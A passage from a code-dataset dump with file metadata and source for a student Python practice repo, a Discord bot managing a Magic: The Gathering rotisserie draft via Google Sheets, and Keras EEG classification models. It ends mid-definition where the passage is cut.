must be >= 0\")\n fuel_to_add = int(input(\n \"How much fule are you putting in? \"))\n car.add_fuel(fuel_to_add)\n print(\"Added {} L of fuel.\".format(fuel_to_add))\n else:\n print(\"Invalid choice\")\n print()\n print(car)\n print(MENU)\n choice = input(\"Enter your choice: \").lower()\n print(\"\\nGood bye {}'s driver.\".format(car.type))\n\n\nmain()"
},
{
"alpha_fraction": 0.4236706793308258,
"alphanum_fraction": 0.48885077238082886,
"avg_line_length": 52,
"blob_id": "308abc5a1a88b9006da70fb8535954e54fb4e775",
"content_id": "0c6c1ec5d686075f44ca0d3e9094a8d25ac5c400",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 583,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 11,
"path": "/prac_5/hex_colours.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "HEX_COLOUR_CODES = {\"blue1\": \"#0000ff\", \"blue2\": \"#0000ee\",\n \"blue4\": \"#00008b\", \"BlueViolet\": \"#8a2be2\",\n \"CadetBlue\": \"#5f9ea0\", \"CadetBlue1\": \"#98f5ff\",\n \"CadetBlue2\": \"#8ee5ee\", \"CadetBlue3\": \"#7ac5cd\",\n \"cyan1\": \"#00ffff\", \"cyan2\": \"#00eeee\"}\n\ncolour_name = input(\"Enter a colour name: \")\nwhile colour_name != \"\":\n print(\"The code for \\\"{}\\\" is {}\".format(colour_name,\n HEX_COLOUR_CODES.get(colour_name)))\n colour_name = input(\"Enter a colour name: \")\n"
},
{
"alpha_fraction": 0.6381215453147888,
"alphanum_fraction": 0.6436464190483093,
"avg_line_length": 24.85714340209961,
"blob_id": "42106e1aab1d02c9ecc03100042a61fd7175913d",
"content_id": "050fdd80a59202b5ff169f14104dc11d1a42f569",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 14,
"path": "/prac_5/cord_occurences.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "words_to_count = {}\nphrase = input(\"Text: \")\n\nwords = phrase.split()\nfor word in words:\n frequency = words_to_count.get(word, 0)\n words_to_count[word] = frequency + 1\n\nwords = list(words_to_count.keys())\nwords.sort()\n\nmax_length = max((len(word) for word in words))\nfor word in words:\n print(\"{:{}} : {}\".format(word, max_length, words_to_count[word]))\n"
},
{
"alpha_fraction": 0.5289855003356934,
"alphanum_fraction": 0.5942028760910034,
"avg_line_length": 22,
"blob_id": "f8bf80a5a80aa3a9f0476f464599cf8145f62cb0",
"content_id": "9615ab054bbf9796fdc193aecfee01709a84d94b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 138,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/prac_1/sales_bunus.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "sales = float(input(\"Enter sales :$\"))\nif sales < 1000:\n bonus = sales * 0.1\nelse:\n bonus = sales * 0.15\nprint(\"Bonus is $\", bonus)\n"
},
{
"alpha_fraction": 0.6291390657424927,
"alphanum_fraction": 0.639072835445404,
"avg_line_length": 27.761905670166016,
"blob_id": "e4da46929d9eb564c50861cb7cb7ad48f10ee039",
"content_id": "67b8a52dda7cacc5a30c6caf04b5e62304843883",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 604,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 21,
"path": "/prac4/quick_picks.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "import random\n\nNUMBERS_PER_LINE = 6\nMIN = 1\nMAX = 45\n\nnumber_of_picks = int(input(\"how many numbers do you pick? \"))\nwhile number_of_picks < 0:\n print(\" invalid number, try again \")\n number_of_picks = int(input(\"how many numbers do you pick? \"))\n\nfor i in range(number_of_picks):\n quick_pick = []\n for number in range(NUMBERS_PER_LINE):\n numbers = random.randint(MIN, MAX)\n while numbers in quick_pick:\n numbers = random.randint(MIN, MAX)\n quick_pick.append(numbers)\n quick_pick.sort()\n\n print(\" \".join(\"{:2}\".format(numbers) for numbers in quick_pick))\n"
}
] | 10 |
JewPCabra666/RotisserieDraftHelperBot
|
https://github.com/JewPCabra666/RotisserieDraftHelperBot
|
b77356010dea3892b2ef9a8783d655a982a8aa0d
|
790c22c2b674b19bdfb822ca4b464e9fbf67e39e
|
5615bbdcf881c22440b0e04c7043596c4fff4096
|
refs/heads/master
| 2023-02-01T16:29:24.573084 | 2020-12-21T23:08:26 | 2020-12-21T23:08:26 | 250,184,560 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8510638475418091,
"alphanum_fraction": 0.8510638475418091,
"avg_line_length": 46,
"blob_id": "35f902094880e24d580fad0be4a46575bc685100",
"content_id": "d57a8b4a1af63e97b6fcaa6306a88f679f2bf9af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 2,
"path": "/README.md",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "# RotisserieDraftHelperBot\nDiscord Bot to assist in Rotisserie Drafts for magic the gathering\n"
},
{
"alpha_fraction": 0.5998266935348511,
"alphanum_fraction": 0.6077989339828491,
"avg_line_length": 28.20942497253418,
"blob_id": "d910fda76c2fa4f8bd128bd09e03e18e2b3b8009",
"content_id": "2ecaca0f01a25c152706f6b88608ea73893e8914",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5776,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 191,
"path": "/bot.py",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "import discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import has_permissions, CheckFailure, Cog\r\nfrom person import get_people, get_cards\r\nfrom credentials import BOTTOKEN\r\nimport time\r\nfrom datetime import timedelta, datetime\r\nimport json\r\nimport threading\r\nimport atexit\r\nfrom sheets import put_value\r\n\r\nbot = commands.Bot(command_prefix='!')\r\n\r\nTOKEN = BOTTOKEN\r\nCUBE_LINK = 'https://cubecobra.com/cube/list/a7y'\r\nSHTLINK = 'https://docs.google.com/spreadsheets/d/1uch6JNOBZR5F4bBTIC8FH__pJV5-mdbILee0jeHOhQo/edit?pli=1#gid=354144647'\r\npeople = get_people()\r\nreverse_people = [x for x in people[::-1]]\r\nCARDS = get_cards()\r\nCURRENT_PERSON_NUM = 0\r\nCURRENT_PERSON = people[CURRENT_PERSON_NUM]\r\nCURRENT_PERSON_NAME = CURRENT_PERSON.alias\r\nPICK_NUMBER = 1\r\nLAST_PICK_TIME = datetime.now()\r\n\r\nstate = {\r\n 'current_person_name': CURRENT_PERSON_NAME,\r\n 'current_pick': 1,\r\n 'last_pick_time': datetime.now()\r\n}\r\n\r\n\r\ndef my_converter(o):\r\n if isinstance(o, datetime):\r\n return o.__str__()\r\n\r\n\r\ndef get_current_person_and_pick():\r\n return CURRENT_PERSON, PICK_NUMBER\r\n\r\n\r\ndef swap_lists():\r\n global people, reverse_people\r\n swap = people\r\n people = reverse_people\r\n reverse_people = swap\r\n\r\n\r\ndef set_current_person(alias):\r\n global CURRENT_PERSON_NAME, CURRENT_PERSON, CURRENT_PERSON_NUM, people\r\n if PICK_NUMBER % 2 == 0:\r\n swap_lists()\r\n for i, x in enumerate(people):\r\n if x.alias == alias:\r\n CURRENT_PERSON_NUM = i\r\n CURRENT_PERSON = x\r\n CURRENT_PERSON_NAME = alias\r\n print(f'Current person set is \\n{CURRENT_PERSON}')\r\n break\r\n\r\n\r\ndef set_next_person(num=1):\r\n global CURRENT_PERSON_NUM, CURRENT_PERSON, CURRENT_PERSON_NAME, PICK_NUMBER, LAST_PICK_TIME\r\n count = num\r\n while count > 0:\r\n if CURRENT_PERSON_NUM == len(people) - 1:\r\n swap_lists()\r\n CURRENT_PERSON_NUM = 0\r\n CURRENT_PERSON = people[CURRENT_PERSON_NUM]\r\n CURRENT_PERSON_NAME = CURRENT_PERSON.alias\r\n PICK_NUMBER += 1\r\n else:\r\n CURRENT_PERSON_NUM += 1\r\n CURRENT_PERSON = people[CURRENT_PERSON_NUM]\r\n CURRENT_PERSON_NAME = CURRENT_PERSON.alias\r\n count -= 1\r\n LAST_PICK_TIME = datetime.now()\r\n\r\n\r\[email protected]\r\nasync def on_ready():\r\n global PICK_NUMBER, CURRENT_PERSON, CURRENT_PERSON_NAME, CURRENT_PERSON_NUM\r\n print('Bot is ready.')\r\n get_state()\r\n PICK_NUMBER = state['current_pick']\r\n set_current_person(state['current_person_name'])\r\n print(f\"GOT THE STATE - {PICK_NUMBER} - {CURRENT_PERSON_NAME}\")\r\n\r\n\r\nclass Drafting(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command()\r\n async def pool(self, ctx):\r\n \"\"\"\\t Get the Current Cube Pool\"\"\"\r\n await ctx.send(CUBE_LINK)\r\n\r\n @commands.command()\r\n async def sheet(self, ctx):\r\n \"\"\"\\t Get the Google Sheet\"\"\"\r\n await ctx.send(SHTLINK)\r\n\r\n @commands.command()\r\n async def pick(self, ctx, *, arg):\r\n \"\"\"Syntax: !pick cardname - will put cardname in your column on google sheet and advance\"\"\"\r\n if check_turn(ctx.author.display_name):\r\n put_value(CURRENT_PERSON.column, PICK_NUMBER, arg)\r\n print(CURRENT_PERSON.column, PICK_NUMBER, arg)\r\n await self.advance(ctx)\r\n else:\r\n print(arg)\r\n await ctx.send(\"👀 It is not your turn to pick yet! 👀\")\r\n\r\n @commands.command()\r\n async def advance(self, ctx, arg=1):\r\n \"\"\"\\t Moves the draft forward a person and resets the clock - takes optional number to move draft forward that many spaces\"\"\"\r\n set_next_person(arg)\r\n persist_state()\r\n await ctx.send(f\"It is now <@{CURRENT_PERSON.id}>'s turn to pick \"\r\n f\"- they have until {(datetime.now() + timedelta(hours=24)).strftime('%A at %H:%M %p')}\")\r\n\r\n @commands.command()\r\n async def whoup(self, ctx):\r\n \"\"\"Find out who the current person is and ping them\"\"\"\r\n await ctx.send(f\"It is <@{CURRENT_PERSON.id}>'s turn to pick \"\r\n f\"- they have until \"\r\n f\"{(LAST_PICK_TIME + timedelta(hours=24)).strftime('%A at %H:%M %p')}\")\r\n\r\n @commands.command()\r\n async def picknum(self, ctx):\r\n \"\"\"Get the current pick number\"\"\"\r\n await ctx.send(f\"It is currently pick {PICK_NUMBER} out of 45 picks\")\r\n\r\n\r\nbot.add_cog(Drafting(bot))\r\n\r\n\r\ndef check_turn(name):\r\n if name == CURRENT_PERSON_NAME:\r\n return True\r\n return False\r\n\r\n\r\ndef get_state():\r\n global state, PICK_NUMBER, LAST_PICK_TIME\r\n with open('last_state.json', 'r') as jsonfile:\r\n state = json.load(jsonfile)\r\n state['last_pick_time'] = datetime.strptime(state['last_pick_time'], \"%Y-%m-%d %H:%M:%S.%f\")\r\n LAST_PICK_TIME = state['last_pick_time']\r\n PICK_NUMBER = state['current_pick']\r\n\r\n\r\ndef persist_state():\r\n global CURRENT_PERSON_NAME, PICK_NUMBER, LAST_PICK_TIME, state\r\n this_state = \\\r\n {'current_person_name': CURRENT_PERSON_NAME,\r\n 'current_pick': PICK_NUMBER,\r\n 'last_pick_time': LAST_PICK_TIME}\r\n state = this_state\r\n with open('last_state.json', 'w+') as jsonfile:\r\n json.dump(this_state, jsonfile, default=my_converter)\r\n\r\n\r\ndef run_bot():\r\n bot.run(TOKEN)\r\n\r\n\r\nt1 = threading.Thread(target=run_bot)\r\nt1.daemon = True\r\nt1.start()\r\n\r\nprint(\"Running Bot\")\r\n\r\n\r\ndef exit_handler():\r\n print(f\"Persisting state at {time.ctime()}\")\r\n persist_state()\r\n print(\"Bot is shutting off\")\r\n\r\n\r\natexit.register(exit_handler)\r\nwhile True:\r\n time.sleep(36000)\r\n persist_state()\r\n print(\"still running\")\r\n#\r\n#\r\n# if __name__ == '__main__':\r\n# main()\r\n"
},
{
"alpha_fraction": 0.6194939017295837,
"alphanum_fraction": 0.6310527920722961,
"avg_line_length": 28.19811248779297,
"blob_id": "7b22b5df022ce200118d9f7884f3a238ccb3b6f6",
"content_id": "630a2191a76633d9ffc75f0569c370293fba6203",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3201,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 106,
"path": "/sheets.py",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\r\nimport pickle\r\nimport os.path\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\n\r\nimport time\r\nimport traceback\r\nimport threading\r\n\r\n# If modifying these scopes, delete the file token.pickle.\r\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\r\n\r\n# The ID and range of a sample spreadsheet.\r\nSAMPLE_SPREADSHEET_ID = '1uch6JNOBZR5F4bBTIC8FH__pJV5-mdbILee0jeHOhQo'\r\nSHEET_ID = '354144647'\r\nSAMPLE_RANGE_NAME = 'Class Data!A2:E'\r\n\r\ncreds = None\r\n# The file token.pickle stores the user's access and refresh tokens, and is\r\n# created automatically when the authorization flow completes for the first\r\n# time.\r\nif os.path.exists('token.pickle'):\r\n with open('token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n# If there are no (valid) credentials available, let the user log in.\r\nif not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n 'credentials.json', SCOPES)\r\n creds = flow.run_local_server(port=0)\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\nservice = build('sheets', 'v4', credentials=creds)\r\n\r\n\r\ndef every(delay, task):\r\n next_time = time.time() + delay\r\n while True:\r\n time.sleep(max(0, next_time - time.time()))\r\n try:\r\n task()\r\n except Exception:\r\n traceback.print_exc()\r\n # in production code you might want to have this instead of course:\r\n # logger.exception(\"Problem while executing repetitive task.\")\r\n # skip tasks if we are behind schedule:\r\n next_time += (time.time() - next_time) // delay * delay + delay\r\n\r\n\r\ndef main():\r\n \"\"\"Shows basic usage of the Sheets API.\r\n Prints values from a sample spreadsheet.\r\n \"\"\"\r\n\r\n\r\n # Call the Sheets API\r\n result = service.spreadsheets().values().get(\r\n spreadsheetId=SAMPLE_SPREADSHEET_ID, range=\"Draft 5 (Commander)!A1:R47\").execute()\r\n print(result)\r\n\r\n values = [\r\n [\"Testing\", \"Testing2\"]\r\n ]\r\n body = {\r\n 'values': values\r\n }\r\n result = service.spreadsheets().values().update(\r\n spreadsheetId=SAMPLE_SPREADSHEET_ID, range='Draft 5 (Commander)!J1:L1',\r\n valueInputOption='RAW', body=body).execute()\r\n\r\n print(result)\r\n\r\n\r\ndef put_value(column, pick_number, value):\r\n values = [\r\n [value]\r\n ]\r\n body = {\r\n 'values' : values\r\n }\r\n result = service.spreadsheets().values().update(\r\n spreadsheetId=SAMPLE_SPREADSHEET_ID,\r\n range=f'Draft 5 (Commander)!{column}{pick_number+2}:{column}{pick_number+2}',\r\n valueInputOption='RAW',\r\n body=body).execute()\r\n print(result)\r\n\r\n\r\n\r\ndef test():\r\n t1 = threading.Thread(target=lambda: every(10, get_current_person_and_pick))\r\n t1.daemon = True\r\n t1.start()\r\n while True:\r\n print(\"testing?\")\r\n time.sleep(5)\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n"
},
{
"alpha_fraction": 0.5972602963447571,
"alphanum_fraction": 0.5972602963447571,
"avg_line_length": 19.47058868408203,
"blob_id": "1c56b5c59f6ae41d6e4909c09c1bd63a3084b028",
"content_id": "f32ef85dbc7f16938692ba682cf3ebcfa97adf4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 17,
"path": "/testing.py",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "import unittest\r\nfrom bot import check_pick\r\n\r\n\r\nclass TestEverything(unittest.TestCase):\r\n\r\n def test_pick_true(self):\r\n x = check_pick('Grand Abolisher')\r\n self.assertEqual(x, True)\r\n\r\n def test_pick_false(self):\r\n x = check_pick('Grand Tester')\r\n self.assertEqual(x, False)\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n"
},
{
"alpha_fraction": 0.5450549721717834,
"alphanum_fraction": 0.5450549721717834,
"avg_line_length": 20.75,
"blob_id": "faa3b605584f39a47a170e65c0397348af477305",
"content_id": "a6ebe8e5ca786bf532b35c90f87f14a1ca27ebc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 910,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 40,
"path": "/person.py",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "import json\r\n\r\nwith open('people.json', 'r') as jsonfile:\r\n people = json.load(jsonfile)\r\n # print(people)\r\n\r\n\r\nclass Person(object):\r\n def __init__(self, name):\r\n self.name = name\r\n self.column = people[name][\"column\"]\r\n self.alias = people[name][\"alias\"]\r\n self.id = people[name]['id']\r\n\r\n def __str__(self):\r\n return f'[\\n name - {self.name}\\n alias - {self.alias}\\n id - {self.id}\\n column - {self.column}\\n]'\r\n\r\n\r\ndef get_people():\r\n people_list = []\r\n for name in people:\r\n people_list.append(Person(name))\r\n return people_list\r\n\r\n\r\ndef get_cards():\r\n cards = []\r\n with open('CommanderCubeRotisserie.txt', 'r') as readfile:\r\n for line in readfile:\r\n cards.append(line.strip())\r\n return cards\r\n\r\n\r\ndef main():\r\n for person in get_people():\r\n print(person)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n"
}
] | 5 |
aldenperrine/ece_247
|
https://github.com/aldenperrine/ece_247
|
a57856337274bdfe8620fb39de6fb0957f00ad46
|
b99c113567ff00481d733c72a0535dcbc5881ade
|
9a3fa125132d725e524abc606f4f399a6b206e7b
|
refs/heads/master
| 2021-02-18T22:46:22.179593 | 2020-03-16T03:04:20 | 2020-03-16T03:04:20 | 245,247,335 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5482571125030518,
"alphanum_fraction": 0.5750554203987122,
"avg_line_length": 37.09449005126953,
"blob_id": "56c34d9b95ee4b3a052c2f124452832291af5338",
"content_id": "c542024a8338e8c3cd890af8fdc3c039be666867",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4963,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 127,
"path": "/load.py",
"repo_name": "aldenperrine/ece_247",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\n\r\ndef load_data():\r\n X_test = np.load(\"project/X_test.npy\")\r\n y_test = np.load(\"project/y_test.npy\")\r\n person_train_valid = np.load(\"project/person_train_valid.npy\")\r\n X_train_valid = np.load(\"project/X_train_valid.npy\")\r\n y_train_valid = np.load(\"project/y_train_valid.npy\")\r\n person_test = np.load(\"project/person_test.npy\")\r\n return (X_test, y_test, person_train_valid, X_train_valid, y_train_valid, person_test)\r\n\r\ndef load_data_subject_1_train_and_test():\r\n X_test = np.load(\"project/X_test.npy\")\r\n y_test = np.load(\"project/y_test.npy\")\r\n person_train_valid = np.load(\"project/person_train_valid.npy\")\r\n X_train_valid = np.load(\"project/X_train_valid.npy\")\r\n y_train_valid = np.load(\"project/y_train_valid.npy\")\r\n person_test = np.load(\"project/person_test.npy\")\r\n\r\n subject_1_count = 0\r\n for i in range(person_train_valid.shape[0]):\r\n if person_train_valid[i] == 0:\r\n subject_1_count += 1\r\n subject_1_valid = [0] * subject_1_count\r\n j = 0\r\n for i in range(person_train_valid.shape[0]):\r\n if person_train_valid[i] == 0:\r\n subject_1_valid[j] = i\r\n j += 1\r\n # print(f'There are {subject_1_count} trials for subject 1')\r\n # print(f'Subject 1 is involved in trials {[x for x in subject_1_valid]}')\r\n s1_x_valid = np.zeros((subject_1_count, 22, 1000))\r\n r = 0\r\n for i in subject_1_valid:\r\n s1_x_valid[r,:,:] = X_train_valid[i,:,:]\r\n r += 1\r\n # print(f's1_x_valid shape is {s1_x_valid.shape}')\r\n s1_y_valid = np.zeros((subject_1_count))\r\n r = 0\r\n for p in subject_1_valid:\r\n s1_y_valid[r] = y_train_valid[p]\r\n r += 1\r\n # print(f's1_y_valid shape is {s1_y_valid.shape}')\r\n\r\n # print('')\r\n # print('test data below')\r\n\r\n subject_1_count_test = 0\r\n for i in range(person_test.shape[0]):\r\n if person_test[i] == 0:\r\n subject_1_count_test += 1\r\n subject_1_valid_test = [0] * subject_1_count_test\r\n j = 0\r\n for i in range(person_test.shape[0]):\r\n if person_test[i] == 0:\r\n subject_1_valid_test[j] = i\r\n j += 1\r\n # print(f'There are {subject_1_count_test} trials for subject 1')\r\n # print(f'Subject 1 is involved in trials {[x for x in subject_1_valid_test]}')\r\n s1_x_test = np.zeros((subject_1_count_test, 22, 1000))\r\n r = 0\r\n for i in subject_1_valid_test:\r\n s1_x_test[r,:,:] = X_test[i,:,:]\r\n r += 1\r\n # print(f's1_x_test shape is {s1_x_test.shape}')\r\n s1_y_test = np.zeros((subject_1_count_test))\r\n r = 0\r\n for p in subject_1_valid_test:\r\n s1_y_test[r] = y_test[p]\r\n r += 1\r\n # print(f's1_y_test shape is {s1_y_test.shape}')\r\n return (s1_x_test, s1_y_test, person_train_valid, s1_x_valid, s1_y_valid, person_test)\r\n\r\ndef load_data_subject_1_test_and_full_train():\r\n X_test = np.load(\"project/X_test.npy\")\r\n y_test = np.load(\"project/y_test.npy\")\r\n person_train_valid = np.load(\"project/person_train_valid.npy\")\r\n X_train_valid = np.load(\"project/X_train_valid.npy\")\r\n y_train_valid = np.load(\"project/y_train_valid.npy\")\r\n person_test = np.load(\"project/person_test.npy\")\r\n\r\n subject_1_count_test = 0\r\n for i in range(person_test.shape[0]):\r\n if person_test[i] == 0:\r\n subject_1_count_test += 1\r\n subject_1_valid_test = [0] * subject_1_count_test\r\n j = 0\r\n for i in range(person_test.shape[0]):\r\n if person_test[i] == 0:\r\n subject_1_valid_test[j] = i\r\n j += 1\r\n # print(f'There are {subject_1_count_test} trials for subject 1')\r\n # print(f'Subject 1 is involved in trials {[x for x in subject_1_valid_test]}')\r\n s1_x_test = np.zeros((subject_1_count_test, 22, 1000))\r\n r = 0\r\n for i in subject_1_valid_test:\r\n s1_x_test[r,:,:] = X_test[i,:,:]\r\n r += 1\r\n # print(f's1_x_test shape is {s1_x_test.shape}')\r\n s1_y_test = np.zeros((subject_1_count_test))\r\n r = 0\r\n for p in subject_1_valid_test:\r\n s1_y_test[r] = y_test[p]\r\n r += 1\r\n # print(f's1_y_test shape is {s1_y_test.shape}')\r\n return (s1_x_test, s1_y_test, person_train_valid, X_train_valid, y_train_valid, person_test)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sets = load_data()\r\n labels = [\"X_test\",\r\n \"y_test\",\r\n \"person_train_valid\",\r\n \"X_train_valid\",\r\n \"y_train_valid\",\r\n \"person_test\"]\r\n print('generating data using all test and all train')\r\n for i, k in enumerate(sets):\r\n print('{}: {} '.format(labels[i], k.shape))\r\n print('generating data using subj 1 test and subj 1 train')\r\n printy = load_data_subject_1_train_and_test()\r\n for i, k in enumerate(printy):\r\n print('{}: {} '.format(labels[i], k.shape))\r\n print('generating data using subj 1 test and full train')\r\n thingy = load_data_subject_1_test_and_full_train()\r\n for i, k in enumerate(thingy):\r\n print('{}: {} '.format(labels[i], k.shape))"
},
{
"alpha_fraction": 0.5862817764282227,
"alphanum_fraction": 0.6196832060813904,
"avg_line_length": 33.187774658203125,
"blob_id": "0c44946251b8cb0be56343ed032effe0fbe42f23",
"content_id": "1336170ae9d0bb9c62640df67fe64af6a00f1ad4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15658,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 458,
"path": "/models.py",
"repo_name": "aldenperrine/ece_247",
"src_encoding": "UTF-8",
"text": "# Mixed precision for running on Nvidia GPU\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n# keras is distinct from tf.keras\nfrom keras import layers as klayers\nfrom keras import models as kmodels\nfrom tensorflow.keras import backend as K\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers, regularizers\nfrom tensorflow.keras.mixed_precision import experimental as mixed_precision\n\nimport numpy as np\n\nimport load\nimport matplotlib.pyplot as plt\n\n\ndef init():\n gpus = tf.config.experimental.list_physical_devices('GPU')\n\n try:\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPUs,\", len(\n logical_gpus), \"Logical GPUs\")\n except RuntimeError as e:\n print(e)\n\n\ndef plot(history):\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n\ndef make_fc_model(x_train, y_train, x_test, y_test):\n x_train = x_train.reshape(2115, -1)\n x_test = x_test.reshape(443, -1)\n y_train -= 769\n y_test -= 769\n\n policy = mixed_precision.Policy('mixed_float16')\n mixed_precision.set_policy(policy)\n num_units = 4096\n inputs = keras.Input(shape=(22000, ), name='eeg_data')\n dense1 = layers.Dense(num_units, activation='relu', name='dense_1')\n x = dense1(inputs)\n dense2 = layers.Dense(num_units, activation='relu', name='dense_2')\n x = dense2(x)\n dense3 = layers.Dense(num_units, activation='relu', name='dense_3')\n x = dense3(x)\n\n # 'kernel' is dense1's variable\n x = layers.Dense(4, name='dense_logits')(x)\n outputs = layers.Activation(\n 'softmax', dtype='float32', name='predictions')(x)\n model = keras.Model(inputs=inputs, outputs=outputs)\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=keras.optimizers.Adam(),\n metrics=['accuracy'])\n history = model.fit(x_train, y_train,\n batch_size=20,\n epochs=10,\n validation_split=0.1)\n test_scores = model.evaluate(x_test, y_test, verbose=2)\n print('Test loss:', test_scores[0])\n print('Test accuracy:', test_scores[1])\n\n return model\n\n\ndef make_cnn_model(x_train, y_train, x_test, y_test, reg=0.001, alpha=.7, learning_rate=0.001, dropout=0.5, epochs=100, relative_size=1.0, optim='SGD'):\n #policy = mixed_precision.Policy('mixed_float16')\n #mixed_precision.set_policy(policy)\n x_train = x_train.transpose((0, 2, 1))[:, :, :, None]\n x_test = x_test.transpose((0, 2, 1))[:, :, :, None]\n y_train -= 769\n y_test -= 769\n\n print(x_train.shape)\n\n model = keras.models.Sequential()\n size = int(25 * relative_size)\n conv1 = layers.Conv2D(size, kernel_size=(\n 10, 1), strides=1, kernel_regularizer=regularizers.l2(reg))\n conv2 = layers.Conv2D(size, kernel_size=(\n 1, 22), kernel_regularizer=regularizers.l2(reg))\n perm1 = layers.Permute((1, 3, 2))\n pool1 = layers.AveragePooling2D(pool_size=(3, 1))\n drop1 = layers.Dropout(dropout)\n\n model.add(conv1)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(conv2)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm1)\n model.add(pool1)\n model.add(drop1)\n\n conv3 = layers.Conv2D(2*size, kernel_size=(10, size),\n kernel_regularizer=regularizers.l2(reg))\n model.add(layers.ELU(alpha))\n perm2 = layers.Permute((1, 3, 2))\n pool2 = layers.AveragePooling2D(pool_size=(3, 1))\n drop2 = layers.Dropout(dropout)\n\n model.add(conv3)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm2)\n model.add(pool2)\n model.add(drop2)\n\n conv4 = layers.Conv2D(4*size, kernel_size=(10, 2*size),\n kernel_regularizer=regularizers.l2(reg))\n perm3 = layers.Permute((1, 3, 2))\n pool3 = layers.AveragePooling2D(pool_size=(3, 1))\n drop3 = layers.Dropout(dropout)\n\n model.add(conv4)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm3)\n model.add(pool3)\n model.add(drop3)\n\n conv5 = layers.Conv2D(8*size, kernel_size=(10, 4*size),\n kernel_regularizer=regularizers.l2(reg))\n perm4 = layers.Permute((1, 3, 2))\n pool4 = layers.AveragePooling2D(pool_size=(3, 1))\n drop4 = layers.Dropout(dropout)\n\n model.add(conv5)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm4)\n model.add(pool4)\n model.add(drop4)\n\n model.add(layers.Flatten())\n\n model.add(layers.Dense(4, name='dense_logits'))\n model.add(layers.Activation('softmax', dtype='float32', name='predictions'))\n\n if optim == 'Adam':\n optimizer = keras.optimizers.Adam(\n learning_rate, beta_1=0.85, beta_2=0.92, amsgrad=True)\n elif optim == 'RMSprop':\n optimizer = keras.optimizers.RMSprop(learning_rate)\n else:\n optimizer = keras.optimizers.SGD(learning_rate, nesterov=True)\n\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n history = model.fit(x_train, y_train,\n batch_size=20,\n epochs=epochs,\n validation_split=0.2,\n verbose=1)\n test_scores = model.evaluate(x_test, y_test, verbose=2)\n print('Test loss:', test_scores[0])\n print('Test accuracy:', test_scores[1])\n\n plot(history)\n\n return model\n\n\ndef 